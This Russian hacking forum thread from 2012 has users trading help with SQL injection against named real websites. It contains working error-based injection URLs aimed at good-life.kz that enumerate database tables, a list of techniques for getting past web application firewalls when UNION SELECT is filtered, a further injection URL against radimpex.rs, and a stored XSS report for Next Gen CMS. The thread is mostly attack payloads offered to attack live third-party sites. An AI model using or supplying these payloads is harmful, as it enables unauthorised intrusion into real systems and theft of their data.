 |
|
12.04.2012, 23:12
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Сообщение от None
Fatal error: Cannot use string offset as an array in /home/www/artwork/stroyprofi.ru/include/tree.inc on line 66
таки никак? раз идет проверка на то, какое значение ввожу, да?
|
|
|
13.04.2012, 02:22
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами:
7519286
Репутация:
-4
|
|
Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.
Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?
|
|
|
|
13.04.2012, 10:21
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от kise
Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.
Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?
Там фильтруется не только `FROM`. У них реализуется на уровне веб-сервера или демона эта шляпа. Очень жесткий фильтр. Ищи места в коде сайта, где данные транскодируются, передаются нестандартными GPC массивами или прямые аплоады и прочие финты ушами. Прямая скуль весьма сомнительно что-что тут тебе даст.
|
|
|
|
13.04.2012, 14:13
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами:
7519286
Репутация:
-4
|
|
http://www.xakep.ru/howto/53202/Kak-obojti-zacshity-Sweb-i-Peterhost-hostingov.htm
Нашел статью, но походу они начали и POST фильтровать...
------------
Кто какие знает уязвимости в Next Gen CMS?
|
|
|
|
13.04.2012, 17:34
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от kise
Кто какие знает уязвимости в Next Gen CMS?
: Next Gen CMS
Версия: 0.9.3 Release [SVN880+FIX01] (Последняя на данный момент)
Уязвимость: XSS Активные
При добавлении новости
Уязвимы поля: " Заголовок", ' тестовый блог
Требуются права модератора или администратора
() mix0x0
|
|
|
|
13.04.2012, 23:05
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Фильтр при запросе union select.Можно ли как то обойти?
|
|
|
|
14.04.2012, 00:25
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
такой вопрос
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//good-life.kz/ru/cat.php?id=5'+and(select+1+from(select+count(*),concat((select+substr(concat_ws(0x3a,table_schema,table_name,table_rows),1,90)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+[/COLOR][/COLOR]
какова он мне выдаёт что возвращается больше одного результата ответа? как исправить? |
|
|
|
14.04.2012, 00:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+1,1),64),rand(0)|0)+having+avg(0)+or'
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+2,1),64),rand(0)|0)+having+avg(0)+or'
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+3,1),64),rand(0)|0)+having+avg(0)+or'
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+4,1),64),rand(0)|0)+having+avg(0)+or'
|
|
|
|
14.04.2012, 03:17
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от kingbeef
Фильтр при запросе union select.Можно ли как то обойти?
Можно.
1. Запостить сюда ссылку.
2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).
Для начало надо определить, что именно фильтруеться.
Просто UNION
Просто SELECT
Связка UNION SELECT
Ну и т.д...
А потом уже действовать.
UNION(SELECT(1),2,version(),(4))
UNION+/*!SELECT*/+1,2,version(),4
/*!UNION+SELECT*/+1,2,version(),4
Попробовать передать данные через POST
Регистр
Вместо пробелов(+) использовать другие символы
И т.д...
|
|
|
|
14.04.2012, 10:45
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Tigger
Можно.
1. Запостить сюда ссылку.
2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).
Для начало надо определить, что именно фильтруеться.
Просто UNION
Просто SELECT
Связка UNION SELECT
Ну и т.д...
А потом уже действовать.
UNION(SELECT(1),2,version(),(4))
UNION+/*!SELECT*/+1,2,version(),4
/*!UNION+SELECT*/+1,2,version(),4
Попробовать передать данные через POST
Регистр
Вместо пробелов(+) использовать другие символы
И т.д...
http://www.radimpex.rs/download.php?id=-1/*|UnIoN*//*|aLl*//*|SeLeCt*/1--&lang=en
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
